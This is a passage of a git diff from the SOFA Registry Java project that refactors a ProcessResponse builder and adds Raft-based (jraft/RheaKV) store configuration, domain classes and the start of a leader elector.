b; - } - - protected static ResponseBuilder setStatus(Boolean status) { - ResponseBuilder b = new ResponseBuilder(); - b.status(status); - return b; + private final Object entity; + + private final Boolean success; + + private final String redirect; + + /** + * constructor + * + * @param entity + * @param success + * @param redirect + */ + public ProcessResponse(Object entity, Boolean success, String redirect) { + this.entity = entity; + this.success = success; + this.redirect = redirect; + } + + /** + * response ok + * + * @return + */ + public static ResponseBuilder ok() { + return setStatus(true); + } + + /** + * response ok + * + * @param entity + * @return + */ + public static ResponseBuilder ok(Object entity) { + ResponseBuilder b = ok(); + b.entity(entity); + return b; + } + + /** + * response fail + * + * @return + */ + public static ResponseBuilder fail() { + return setStatus(false); + } + + /** + * response fail + * + * @param errorMsg + * @return + */ + public static ResponseBuilder fail(String errorMsg) { + ResponseBuilder b = fail(); + b.entity(errorMsg); + return b; + } + + /** + * response redirect + * + * @param leader + * @return + */ + public static ResponseBuilder redirect(String leader) { + ResponseBuilder b = fail(); + b.entity("Not leader"); + b.redirect(leader); + return b; + } + + protected static ResponseBuilder setStatus(Boolean status) { + ResponseBuilder b = new ResponseBuilder(); + b.status(status); + return b; + } + + /** + * Getter method for property entity. + * + * @return property value of entity + */ + public Object getEntity() { + return entity; + } + + /** + * Getter method for property success. + * + * @return property value of success + */ + public Boolean getSuccess() { + return success; + } + + /** + * Getter method for property redirect. + * + * @return property value of redirect + */ + public String getRedirect() { + return redirect; + } + + /** ResponseBuilder */ + public static class ResponseBuilder { + private Object entity; + + private Boolean success; + private String redirect; + + public ProcessResponse build() { + final ProcessResponse r = new ProcessResponse(entity, success, redirect); + reset(); + return r; } - /** - * Getter method for property entity. - * - * @return property value of entity - */ - public Object getEntity() { - return entity; + private void reset() { + success = null; + entity = null; + redirect = null; } - /** - * Getter method for property success. - * - * @return property value of success - */ - public Boolean getSuccess() { - return success; + public ResponseBuilder status(Boolean status) { + if (status == null) { + throw new IllegalArgumentException("response status can not be null!"); + } + this.success = status; + return this; } - /** - * Getter method for property redirect. - * - * @return property value of redirect - */ - public String getRedirect() { - return redirect; + public ResponseBuilder entity(Object entity) { + this.entity = entity; + return this; } - /** - * ResponseBuilder - */ - public static class ResponseBuilder { - private Object entity; - - private Boolean success; - private String redirect; - - public ProcessResponse build() { - final ProcessResponse r = new ProcessResponse(entity, success, redirect); - reset(); - return r; - } - - private void reset() { - success = null; - entity = null; - redirect = null; - } - - public ResponseBuilder status(Boolean status) { - if (status == null) { - throw new IllegalArgumentException("response status can not be null!"); - } - this.success = status; - return this; - } - - public ResponseBuilder entity(Object entity) { - this.entity = entity; - return this; - } - - public ResponseBuilder redirect(String redirect) { - if (redirect == null) { - throw new IllegalArgumentException("redirect leader can not be null!"); - } - this.redirect = redirect; - return this; - } + public ResponseBuilder redirect(String redirect) { + if (redirect == null) { + throw new IllegalArgumentException("redirect leader can not be null!"); + } + this.redirect = redirect; + return this; } -} \ No newline at end of file + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultCommonConfig.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultCommonConfig.java new file mode 100644 index 000000000..882b8fddb --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultCommonConfig.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.config; + +/** + * @author xiaojian.xj + * @version $Id: DefaultCommonConfig.java, v 0.1 2021年03月22日 21:05 xiaojian.xj Exp $ + */ +public interface DefaultCommonConfig { + + String getClusterId(); +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultCommonConfigBean.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultCommonConfigBean.java new file mode 100644 index 000000000..5d1732d08 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultCommonConfigBean.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.config; + +import com.alipay.sofa.common.profile.StringUtil; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.util.SystemUtils; + +/** + * @author xiaojian.xj + * @version $Id: DefaultCommonConfigBean.java, v 0.1 2021年03月22日 21:06 xiaojian.xj Exp $ + */ +public class DefaultCommonConfigBean implements DefaultCommonConfig { + + private String dataCenter = SystemUtils.getSystem("nodes.localDataCenter", "DefaultDataCenter"); + + private String clusterId = SystemUtils.getSystem("nodes.clusterId", ""); + + @Override + public String getClusterId() { + if (StringUtil.isNotEmpty(clusterId)) { + return clusterId; + } + return dataCenter; + } + + /** + * Setter method for property clusterId. + * + * @param clusterId value to be assigned to property clusterId + */ + public void setClusterId(String clusterId) { + this.clusterId = clusterId; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultConfigs.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultConfigs.java new file mode 100644 index 000000000..fdc8cde7e --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/DefaultConfigs.java @@ -0,0 +1,20 @@ + +package com.alipay.sofa.registry.jraft.config; + +import java.io.File; + +/** + * @author : xingpeng + * @date : 2021-06-26 16:16 + **/ +public final class DefaultConfigs { + + public static String DB_PATH = "rhea_db" + File.separator; + + public static String RAFT_DATA_PATH = "raft_data" + File.separator; + + //127.0.0.1:8182,127.0.0.1:8183 + public static String ADDRESS = "localhost"; + + public static String CLUSTER_NAME = "rhea_example"; +} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetaElectorConfig.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetaElectorConfig.java new file mode 100644 index 000000000..8bd0446d1 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetaElectorConfig.java @@ -0,0 +1,9 @@ +package com.alipay.sofa.registry.jraft.config; + +/** + * @author xiaojian.xj + * @version $Id: DefaultCommonConfig.java, v 0.1 2021年03月22日 21:05 xiaojian.xj Exp $ + */ +public interface MetaElectorConfig { + long getLockExpireDuration(); +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetaElectorConfigBean.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetaElectorConfigBean.java new file mode 100644 index 000000000..52ff38533 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetaElectorConfigBean.java @@ -0,0 +1,28 @@ +package com.alipay.sofa.registry.jraft.config; + +import org.springframework.boot.context.properties.ConfigurationProperties; + +/** + * @author xiaojian.xj + * @version $Id: DefaultCommonConfig.java, v 0.1 2021年03月22日 21:05 xiaojian.xj Exp $ + */ +@ConfigurationProperties(prefix = MetaElectorConfigBean.PRE_FIX) +public class MetaElectorConfigBean implements MetaElectorConfig { + public static final String PRE_FIX = "meta.server.elector"; + + private long lockExpireDuration = 20 * 1000; + + @Override + public long getLockExpireDuration() { + return lockExpireDuration; + } + + /** + * Setter method for property lockExpireDuration. + * + * @param lockExpireDuration value to be assigned to property lockExpireDuration + */ + public void setLockExpireDuration(long lockExpireDuration) { + this.lockExpireDuration = lockExpireDuration; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetadataConfig.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetadataConfig.java new file mode 100644 index 000000000..2df159391 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetadataConfig.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.config; + +/** + * @author xiaojian.xj + * @version $Id: MetadataConfig.java, v 0.1 2021年02月24日 15:20 xiaojian.xj Exp $ + */ +public interface MetadataConfig { + + int getInterfaceAppsRefreshLimit(); + + int getRevisionGcLimit(); +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetadataConfigBean.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetadataConfigBean.java new file mode 100644 index 000000000..2af82055e --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/MetadataConfigBean.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.config; + +import org.springframework.boot.context.properties.ConfigurationProperties; + +/** + * @author xiaojian.xj + * @version $Id: MetadataConfigBean.java, v 0.1 2021年02月24日 15:21 xiaojian.xj Exp $ + */ +@ConfigurationProperties(prefix = MetadataConfigBean.PRE_FIX) +public class MetadataConfigBean implements MetadataConfig { + + public static final String PRE_FIX = "metadata.server"; + + private int interfaceAppsRefreshLimit = 1000; + + private int revisionGcLimit = 100; + + /** + * Getter method for property interfaceAppsRefreshLimit. + * + * @return property value of interfaceAppsRefreshLimit + */ + public int getInterfaceAppsRefreshLimit() { + return interfaceAppsRefreshLimit; + } + + /** + * Setter method for property interfaceAppsRefreshLimit. + * + * @param interfaceAppsRefreshLimit value to be assigned to property interfaceAppsRefreshLimit + */ + public void setInterfaceAppsRefreshLimit(int interfaceAppsRefreshLimit) { + this.interfaceAppsRefreshLimit = interfaceAppsRefreshLimit; + } + + /** + * Getter method for property revisionGcLimit. + * + * @return property value of revisionGcLimit + */ + @Override + public int getRevisionGcLimit() { + return revisionGcLimit; + } + + /** + * Setter method for property revisionGcLimit. + * + * @param revisionGcLimit value to be assigned to property revisionGcLimit + */ + public void setRevisionGcLimit(int revisionGcLimit) { + this.revisionGcLimit = revisionGcLimit; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/RaftConfiguration.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/RaftConfiguration.java new file mode 100644 index 000000000..d4770ae37 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/RaftConfiguration.java @@ -0,0 +1,130 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.config; + +import com.alipay.sofa.jraft.rhea.client.DefaultRheaKVStore; +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.jraft.rhea.options.PlacementDriverOptions; +import com.alipay.sofa.jraft.rhea.options.RheaKVStoreOptions; +import com.alipay.sofa.jraft.rhea.options.StoreEngineOptions; +import com.alipay.sofa.jraft.rhea.options.configured.PlacementDriverOptionsConfigured; +import com.alipay.sofa.jraft.rhea.options.configured.RheaKVStoreOptionsConfigured; +import com.alipay.sofa.jraft.rhea.options.configured.RocksDBOptionsConfigured; +import com.alipay.sofa.jraft.rhea.options.configured.StoreEngineOptionsConfigured; +import com.alipay.sofa.jraft.rhea.storage.StorageType; +import com.alipay.sofa.jraft.util.Endpoint; +import com.alipay.sofa.registry.jraft.repository.impl.*; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import com.alipay.sofa.registry.store.api.repository.AppRevisionHeartbeatRepository; +import com.alipay.sofa.registry.store.api.repository.AppRevisionRepository; +import com.alipay.sofa.registry.store.api.repository.InterfaceAppsRepository; +import com.alipay.sofa.registry.store.api.spring.SpringContext; +import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean; +import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty; +import org.springframework.boot.context.properties.EnableConfigurationProperties; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +/** + * @author : xingpeng + * @date : 2021-07-06 16:16 + **/ +@Configuration +@EnableConfigurationProperties +@ConditionalOnProperty( + value = SpringContext.PERSISTENCE_PROFILE_ACTIVE, + havingValue = SpringContext.META_STORE_API_RAFT) +public class RaftConfiguration { + + @Configuration + public static class MetadataBeanConfiguration{ + @Bean + public DefaultCommonConfig defaultCommonConfig(){ + return new DefaultCommonConfigBean(); + } + + @Bean + public MetaElectorConfig metaElectorConfig(){ + return new MetaElectorConfigBean(); + } + + @Bean + public MetadataConfig metadataConfig() { + return new MetadataConfigBean(); + } + } + + + @Configuration + public static class RheaKVBeanConfiguration{ + + @Bean() + @ConditionalOnMissingBean(RheaKVStore.class) + public RheaKVStore rheaKVStore(){ + DefaultRheaKVStore defaultRheaKVStore = new DefaultRheaKVStore(); + String address = DefaultConfigs.ADDRESS; + StoreEngineOptions storeOpts = StoreEngineOptionsConfigured.newConfigured() + .withStorageType(StorageType.RocksDB) + .withRocksDBOptions(RocksDBOptionsConfigured.newConfigured().withDbPath(DefaultConfigs.DB_PATH).config()) + .withRaftDataPath(DefaultConfigs.RAFT_DATA_PATH) + .withServerAddress(new Endpoint(address, 8181)) + .config(); + + PlacementDriverOptions pdOpts = PlacementDriverOptionsConfigured.newConfigured() + .withFake(true) + .config(); + + RheaKVStoreOptions rheaKVStoreOptions = RheaKVStoreOptionsConfigured.newConfigured() + .withStoreEngineOptions(storeOpts) + .withPlacementDriverOptions(pdOpts) + .withInitialServerList(address+":"+"8181") + .config(); + + defaultRheaKVStore.init(rheaKVStoreOptions); + return defaultRheaKVStore; + } + +// @Bean +// public AppRevisionHeartbeatBatchCallable appRevisionHeartbeatBatchCallable() { +// return new AppRevisionHeartbeatBatchCallable(); +// } + } + + @Configuration + public static class RepositoryBeanConfiguration { + @Bean + public AppRevisionRepository appRevisionRaftRepository() { + return new AppRevisionRaftRepository(); + } + + @Bean + public InterfaceAppsRepository interfaceAppsRaftRepository() { + return new InterfaceAppsRaftRepository(); + } + + @Bean + public AppRevisionHeartbeatRepository appRevisionHeartbeatRaftRepository() { + return new AppRevisionHeartbeatRaftRepository(); + } + + @Bean + public ProvideDataRepository provideDataRepository(){ + return new ProvideDataRaftRepository(); + } + } + +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/RaftElectorConfiguration.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/RaftElectorConfiguration.java new file mode 100644 index 000000000..eab6b1fb6 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/config/RaftElectorConfiguration.java @@ -0,0 +1,28 @@ +package com.alipay.sofa.registry.jraft.config; + +import com.alipay.sofa.registry.jraft.elector.MetaRaftLeaderElector; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import com.alipay.sofa.registry.store.api.spring.SpringContext; +import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty; +import org.springframework.boot.context.properties.EnableConfigurationProperties; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +/** + * @author : xingpeng + * @date : 2021-07-06 16:16 + **/ +@Configuration +@EnableConfigurationProperties +@ConditionalOnProperty( + value = SpringContext.PERSISTENCE_PROFILE_ACTIVE, + havingValue = SpringContext.META_STORE_API_RAFT) +public class RaftElectorConfiguration { + @Configuration + public static class RaftElectorBeanConfiguration { + @Bean + public LeaderElector leaderElector() { + return new MetaRaftLeaderElector(); + } + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/InterfaceAppsDomain.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/InterfaceAppsDomain.java new file mode 100644 index 000000000..900238c66 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/InterfaceAppsDomain.java @@ -0,0 +1,214 @@ +package com.alipay.sofa.registry.jraft.domain; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.util.MessageDigests; + +import java.io.Serializable; +import java.sql.Timestamp; +import java.util.Set; + +/** + * @author : xingpeng + * @date : 2021-07-15 08:35 + **/ +public class InterfaceAppsDomain implements Serializable { + /** local data center */ + private String dataCenter; + + /** interfaceName */ + private String interfaceName; + + /** appName */ + private String appName; + + /** reference */ + private boolean reference; + + /** hashcode */ + private String hashcode; + + /** last update time */ + private Timestamp gmtModify; + + /** interfaceMapping */ + private long nanosVersion; + + private Set apps; + + public InterfaceAppsDomain() {} + + public InterfaceAppsDomain(String dataCenter, String interfaceName, String appName) { + this.dataCenter = dataCenter; + this.interfaceName = interfaceName; + this.appName = appName; + this.hashcode = MessageDigests.getMd5String(interfaceName); + } + + public InterfaceAppsDomain(String dataCenter, String interfaceName, String appName, Timestamp gmtModify) { + this.dataCenter = dataCenter; + this.interfaceName = interfaceName; + this.appName = appName; + this.gmtModify = gmtModify; + this.hashcode = MessageDigests.getMd5String(interfaceName); + } + + public InterfaceAppsDomain(String dataCenter, String interfaceName, String appName, long nanosVersion , Set apps) { + this.dataCenter = dataCenter; + this.interfaceName = interfaceName; + this.appName = appName; + this.hashcode = MessageDigests.getMd5String(interfaceName); + this.nanosVersion=nanosVersion; + this.apps=apps; + } + + public InterfaceAppsDomain(String dataCenter, String interfaceName, String appName, boolean reference, String hashcode, Timestamp gmtModify, long nanosVersion, Set apps) { + this.dataCenter = dataCenter; + this.interfaceName = interfaceName; + this.appName = appName; + this.reference = reference; + this.hashcode = hashcode; + this.gmtModify = gmtModify; + this.nanosVersion = nanosVersion; + this.apps = apps; + } + + public InterfaceAppsDomain(String dataCenter, String interfaceName, long nanosVersion, Set apps) { + this.dataCenter = dataCenter; + this.interfaceName = interfaceName; + this.nanosVersion = nanosVersion; + this.apps = apps; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property interfaceName. + * + * @return property value of interfaceName + */ + public String getInterfaceName() { + return interfaceName; + } + + /** + * Setter method for property interfaceName. + * + * @param interfaceName value to be assigned to property interfaceName + */ + public void setInterfaceName(String interfaceName) { + this.interfaceName = interfaceName; + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } + + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = appName; + } + + public boolean isReference() { + return reference; + } + + /** + * Setter method for property reference. + * + * @param reference value to be assigned to property reference + */ + public void setReference(boolean reference) { + this.reference = reference; + } + + /** + * Getter method for property gmtModify. + * + * @return property value of gmtModify + */ + public Timestamp getGmtModify() { + return gmtModify; + } + + /** + * Setter method for property gmtModify. + * + * @param gmtModify value to be assigned to property gmtModify + */ + public void setGmtModify(Timestamp gmtModify) { + this.gmtModify = gmtModify; + } + + /** + * Getter method for property hashcode. + * + * @return property value of hashcode + */ + public String getHashcode() { + return hashcode; + } + + /** + * Setter method for property hashcode. + * + * @param hashcode value to be assigned to property hashcode + */ + public void setHashcode(String hashcode) { + this.hashcode = hashcode; + } + + public long getNanosVersion() { + return nanosVersion; + } + + public void setNanosVersion(long nanosVersion) { + this.nanosVersion = nanosVersion; + } + + public Set getApps() { + return apps; + } + + public void setApps(Set apps) { + this.apps = apps; + } + + @Override + public String toString() { + return "InterfaceAppsDomain{" + + "dataCenter='" + dataCenter + '\'' + + ", interfaceName='" + interfaceName + '\'' + + ", appName='" + appName + '\'' + + ", reference=" + reference + + ", hashcode='" + hashcode + '\'' + + ", gmtModify=" + gmtModify + + ", nanosVersion=" + nanosVersion + + ", apps=" + apps + + '}'; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/LeaderLockDomain.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/LeaderLockDomain.java new file mode 100644 index 000000000..2f0c504c8 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/LeaderLockDomain.java @@ -0,0 +1,120 @@ +package com.alipay.sofa.registry.jraft.domain; + +import com.alipay.sofa.registry.store.api.elector.AbstractLeaderElector; + +import java.io.Serializable; +import java.util.Date; + +/** + * @author : xingpeng + * @date : 2021-07-12 08:54 + **/ +public class LeaderLockDomain implements Serializable { + private long epoch; + + private String leader; + + private long expireTimestamp; + + private String lockName; + + private String dataCenter; + + private String owner; + + private Date gmtModified; + + private long duration; + + public LeaderLockDomain(String lockName, long epoch, String leader, long expireTimestamp, Date gmtModified, String dataCenter, String owner, long duration){ + this.lockName=lockName; + this.gmtModified=gmtModified; + this.dataCenter=dataCenter; + this.owner=owner; + this.duration=duration; + this.epoch=epoch; + this.leader=leader; + this.expireTimestamp=expireTimestamp; + } + + public LeaderLockDomain() { + } + + public long getEpoch() { + return epoch; + } + + public void setEpoch(long epoch) { + this.epoch = epoch; + } + + public String getLeader() { + return leader; + } + + public String getLockName() { + return lockName; + } + + public Date getGmtModified() { + return gmtModified; + } + + public String getDataCenter() { + return dataCenter; + } + + public String getOwner() { + return owner; + } + + public long getDuration() { + return duration; + } + + public void setLockName(String lockName) { + this.lockName = lockName; + } + + public void setGmtModified(Date gmtModified) { + this.gmtModified = gmtModified; + } + + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + public void setOwner(String owner) { + this.owner = owner; + } + + public void setDuration(long duration) { + this.duration = duration; + } + + public void setLeader(String leader) { + this.leader = leader; + } + + public long getExpireTimestamp() { + return expireTimestamp; + } + + public void setExpireTimestamp(long expireTimestamp) { + this.expireTimestamp = expireTimestamp; + } + + @Override + public String toString() { + return "LeaderLockDomain{" + + "epoch=" + epoch + + ", leader='" + leader + '\'' + + ", expireTimestamp=" + expireTimestamp + + ", lockName='" + lockName + '\'' + + ", dataCenter='" + dataCenter + '\'' + + ", owner='" + owner + '\'' + + ", gmtModified=" + gmtModified + + ", duration=" + duration + + '}'; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/ProvideDataDomain.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/ProvideDataDomain.java new file mode 100644 index 000000000..992ef9048 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/domain/ProvideDataDomain.java @@ -0,0 +1,160 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.domain; + +import java.io.Serializable; +import java.util.Date; + +/** + * @author : xingpeng + * @date : 2021-07-15 08:35 + **/ +public class ProvideDataDomain implements Serializable { + + /** local data center */ + private String dataCenter; + + /** data dataKey */ + private String dataKey; + + /** data dataValue */ + private String dataValue; + + /** last update time */ + private Date gmtModified; + + /** data version */ + private long dataVersion; + + public ProvideDataDomain() {} + + public ProvideDataDomain(String dataCenter, String dataKey, String dataValue, long dataVersion) { + this.dataCenter = dataCenter; + this.dataKey = dataKey; + this.dataValue = dataValue; + this.dataVersion = dataVersion; + } + + public ProvideDataDomain(String dataCenter, String dataKey, String dataValue, Date gmtModified, long dataVersion) { + this.dataCenter = dataCenter; + this.dataKey = dataKey; + this.dataValue = dataValue; + this.gmtModified = gmtModified; + this.dataVersion = dataVersion; + } + + /** + * Getter method for property dataCenter. + * + * @return property dataValue of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter dataValue to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property dataKey. + * + * @return property dataValue of dataKey + */ + public String getDataKey() { + return dataKey; + } + + /** + * Setter method for property dataKey. + * + * @param dataKey dataValue to be assigned to property dataKey + */ + public void setDataKey(String dataKey) { + this.dataKey = dataKey; + } + + /** + * Getter method for property dataValue. + * + * @return property dataValue of dataValue + */ + public String getDataValue() { + return dataValue; + } + + /** + * Setter method for property dataValue. + * + * @param dataValue dataValue to be assigned to property dataValue + */ + public void setDataValue(String dataValue) { + this.dataValue = dataValue; + } + + /** + * Getter method for property gmtModified. + * + * @return property dataValue of gmtModified + */ + public Date getGmtModified() { + return gmtModified; + } + + /** + * Setter method for property gmtModified. + * + * @param gmtModified dataValue to be assigned to property gmtModified + */ + public void setGmtModified(Date gmtModified) { + this.gmtModified = gmtModified; + } + + /** + * Getter method for property dataVersion. + * + * @return property value of dataVersion + */ + public long getDataVersion() { + return dataVersion; + } + + /** + * Setter method for property dataVersion. + * + * @param dataVersion value to be assigned to property dataVersion + */ + public void setDataVersion(long dataVersion) { + this.dataVersion = dataVersion; + } + + @Override + public String toString() { + return "ProvideDataDomain{" + + "dataCenter='" + dataCenter + '\'' + + ", dataKey='" + dataKey + '\'' + + ", dataValue='" + dataValue + '\'' + + ", gmtModified=" + gmtModified + + ", dataVersion=" + dataVersion + + '}'; + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/elector/MetaRaftLeaderElector.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/elector/MetaRaftLeaderElector.java new file mode 100644 index 000000000..89cfa28f9 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/elector/MetaRaftLeaderElector.java @@ -0,0 +1,229 @@ +package com.alipay.sofa.registry.jraft.elector; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.config.MetaElectorConfig; +import com.alipay.sofa.registry.jraft.domain.LeaderLockDomain; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.elector.AbstractLeaderElector; +import org.springframework.beans.factory.annotation.Autowired; + +import java.util.Date; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; + +/** + * @author : xingpeng + * @date : 2021-06-24 15:20 + **/ +public class MetaRaftLeaderElector extends AbstractLeaderElector { + + private static final Logger LOG = LoggerFactory.getLogger(MetaRaftLeaderElector.class); + + @Autowired + private RheaKVStore rheaKVStore; + + @Autowired + private MetaElectorConfig metaElectorConfig; + + @Autowired + private DefaultCommonConfig defaultCommonConfig; + + private static final String distributeLock ="DISTRIBUTE-LOCk"; + + private static final String lockName = "META-MASTER"; + + /**Map<集群节点,节点锁>*/ + protected Map leaderInfoMap = new ConcurrentHashMap<>(); + + @Override + protected LeaderInfo doQuery() { + Map map = null; + byte[] bytes = rheaKVStore.bGet(distributeLock); + try{ + map = CommandCodec.decodeCommand(bytes, leaderInfoMap.getClass()); + }catch (NullPointerException e){ + LOG.info("DISTRIBUTE-LOCk RheaKV is empty"); + } + + LeaderLockDomain leaderInfo = map.get(defaultCommonConfig.getClusterId()); + + if(leaderInfo==null){ + return LeaderInfo.HAS_NO_LEADER; + } + + return new LeaderInfo(leaderInfo.getEpoch(),leaderInfo.getLeader(),leaderInfo.getExpireTimestamp()); + } + + @Override + protected LeaderInfo doElect() { + byte[] bytes = rheaKVStore.bGet(distributeLock); + Map map=null; + 